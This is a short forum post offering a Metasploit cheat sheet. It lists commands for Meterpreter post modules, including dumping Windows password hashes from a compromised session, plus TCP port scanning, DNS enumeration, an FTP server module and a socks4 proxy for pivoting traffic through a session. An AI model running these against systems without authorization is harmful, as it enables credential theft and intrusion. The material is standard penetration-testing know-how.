#1
This is just for educational purpose

Here i am introducing some cheat sheet for Metasploit.
The purpose of this cheat sheet is to describe some common options for some of the various components of the Metasploit Framework


Meterpreter Post Modules

With an available Meterpreter session, post modules can be run on the target machine.


Post Modules from Meterpreter
Code:
meterpreter > run post/multi/gather/env

Post Modules on a Backgrounded Session
Code:
msf > use post/windows/gather/hashdump
msf > show options
msf > set SESSION 1
msf > run

Useful Auxiliary Modules

Port Scanner:

Code:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

DNS  Enumeration:
Code:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server:
Code:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server:
Code:
msf > use auxiliary/server/socks4
msf > run

Any proxied traffic that matches the subnet of a route will be routed through the session specified by route.Use proxychains configured for socks4 to route any application's traffic through a Meterpreter session.